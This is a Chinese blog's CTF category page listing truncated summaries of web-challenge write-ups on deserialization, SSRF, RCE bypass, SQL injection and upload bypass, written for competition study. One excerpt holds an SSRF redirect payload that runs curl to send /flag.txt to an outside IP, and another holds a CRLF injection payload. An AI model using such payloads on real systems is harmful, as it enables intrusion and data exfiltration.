随笔分类 -  CTF历程

CTF历程
摘要:Web Mercy-code <?php highlight_file(__FILE__); if ($_POST['cmd']) { $cmd = $_POST['cmd']; if (';' preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) { if ( 阅读全文
posted @ 2023-01-09 10:41 seizer-zyx 阅读(208) 评论(0) 推荐(0) 编辑
摘要:MagicProxy ssrf重定向绕过 <?php header("Location:http://127.0.0.1:8080/admin?command=curl%20-F%20file=@/flag.txt%20http%3A%2F%2F82.157.174.226%3A8888"); ex 阅读全文
posted @ 2023-01-09 10:41 seizer-zyx 阅读(84) 评论(0) 推荐(0) 编辑
摘要:popop 访问class.php 简单,直接exp <?php class s{ public $f; public function __construct() { $this->f = new T; } } class T{ public $f; public $s; public funct 阅读全文
posted @ 2023-01-09 10:40 seizer-zyx 阅读(140) 评论(0) 推荐(0) 编辑
摘要:online_crt 通过以下点进行CRLF触发/admin/rename处修改crt文件名 经过本地多次测试获得payload uri=/admin%252Frename%3Foldname%3D4c9a3b84-f582-42e2-b1db-21d44c982eb6.crt%26newname% 阅读全文
posted @ 2023-01-09 10:34 seizer-zyx 阅读(101) 评论(0) 推荐(0) 编辑
摘要:积分榜 Web SimpleRCE 非预期 盲读/flag,通过请求头传入参数绕过waf 预期 利用原生类! phpdest 原题:https://www.shawroot.cc/1917.html <?php highlight_file(__FILE__); require_once 'flag 阅读全文
posted @ 2023-01-09 10:29 seizer-zyx 阅读(687) 评论(1) 推荐(0) 编辑
摘要:冬奥会 <?php show_source(__FILE__); $Step1=False; $Step2=False; $info=(array)json_decode(@$_GET['Information']); if(is_array($info)){ var_dump($info); is 阅读全文
posted @ 2023-01-09 10:24 seizer-zyx 阅读(36) 评论(0) 推荐(0) 编辑
摘要:Web Sign_in <?php highlight_file(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); curl_setopt($ch, CURLOPT_HEADER, 0); curl_ 阅读全文
posted @ 2023-01-08 23:42 seizer-zyx 阅读(34) 评论(0) 推荐(0) 编辑
摘要:Web easy_php 审计源码: <?php highlight_file(__FILE__); error_reporting(0); function new_addslashes($string) { if(!is_array($string)) return addslashes($st 阅读全文
posted @ 2023-01-08 23:35 seizer-zyx 阅读(47) 评论(0) 推荐(0) 编辑
摘要:前言 没想到第一次拿一血还是因为被做核酸叫起来,然后睡不着做的题! Web ez_unserialize 源码: <?php class A { public $var1; public $var2; public $secret; function __construct($p1, $p2) { 阅读全文
posted @ 2023-01-08 23:34 seizer-zyx 阅读(66) 评论(0) 推荐(0) 编辑
摘要:前言 感谢西电举办的这次抗疫CTF,既是宣传了CTF,也可以让大家学到更多的抗疫知识,让我们一起为西安加油! Web F12 AAEncode加密 ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) 阅读全文
posted @ 2023-01-08 23:33 seizer-zyx 阅读(271) 评论(0) 推荐(0) 编辑
摘要:这次的长安“战疫”搞得还挺大的,那么多大佬都来比赛了,我摸摸鱼就好... Web RCE_No_Para 看到这么短的审计就心慌, <?php if(';' preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match( 阅读全文
posted @ 2023-01-08 23:30 seizer-zyx 阅读(74) 评论(0) 推荐(0) 编辑
摘要:前言 好几天都没发文章了,这几天去肝工大抗疫比赛去了,这比赛主要考了信息搜集能力,除Web以外我没觉得学到多少东西 ~~太笨了,搜题我竟然只用google,以后记得把Bing、Baidu、搜狗什么的都用上~~ 我什么都没说,大家以后打比赛不要像我一样,还是钻研技术为主,~~大型比赛~~上还是要认真对 阅读全文
posted @ 2023-01-08 23:27 seizer-zyx 阅读(409) 评论(0) 推荐(0) 编辑
摘要:[2019强网杯]随便注 考点:1、堆叠注入 2、sql预处理语句 之前做过的一道题,再次遇到发现还是有很多需要学习的地方,也没有记录过堆叠注入的题,所以就想着记一下这道题的一些知识点。 堆叠注入原理 在sql中,分号;是用来表示一条sql语句的结束。 所以在;后再接一个sql语句将会一起执行,从而 阅读全文
posted @ 2023-01-08 23:26 seizer-zyx 阅读(188) 评论(0) 推荐(0) 编辑
摘要:Loginme 有源码,没学过go,瞎看middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.C 阅读全文
posted @ 2023-01-08 23:24 seizer-zyx 阅读(91) 评论(0) 推荐(0) 编辑
摘要:Web [签到] flag 等一会后把内容复制下来,然后执行一下脚本: import re import base64 flag = '' f = open('flag.txt', 'r') content = f.read() for i in range(20): match = re.sear 阅读全文
posted @ 2023-01-08 23:21 seizer-zyx 阅读(20) 评论(0) 推荐(0) 编辑
摘要:bestphp's revenge 考点:1、SoapClient触发反序列化导致ssrf 2、serialize_hander处理session方式不同导致session注入 又学到了一个新的知识点 首页面给出了源码 index.php <?php highlight_file(__FILE__) 阅读全文
posted @ 2023-01-08 23:21 seizer-zyx 阅读(41) 评论(0) 推荐(0) 编辑
摘要:[WUSTCTF2020]CV Maker 考点:文件上传 bypass 进入题目,一个看着非常复杂得页面 通过瞎点一通或者通过查看源码,发现就只有注册和登录功能是可以用的,所以先来注册一个账号登录进去。 登录成功后发现可以上传文件,通过测试猜测是通过文件头信息进行过滤的,其余没有任何过滤,所以先上 阅读全文
posted @ 2023-01-08 23:20 seizer-zyx 阅读(146) 评论(0) 推荐(0) 编辑
摘要:[SWPUCTF 2018]SimplePHP 考点:1、PHP代码审计 2、Phar反序列化漏洞 网站中有两个功能:查看文件和上传文件,利用查看文件将源码都先弄下来进行PHP代码审计。 file.php <?php header("content-type:text/html;charset=ut 阅读全文
posted @ 2023-01-08 23:20 seizer-zyx 阅读(122) 评论(0) 推荐(0) 编辑
摘要:[SUCTF 2019]EasyWeb 考点:1、文件上传 bypass 2、.htaccess的利用 开局源代码 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $us 阅读全文
posted @ 2023-01-08 23:20 seizer-zyx 阅读(259) 评论(0) 推荐(0) 编辑
摘要:[NCTF2019]SQLi 考点:sql bypass 一道sql题,非常友好的给出了sqlquery,但想必也不简单 sqlquery : select * from users where username='1' and passwd='1' 这中语句非常典型,不试都能猜到必然过滤了',在u 阅读全文
posted @ 2023-01-08 23:19 seizer-zyx 阅读(113) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示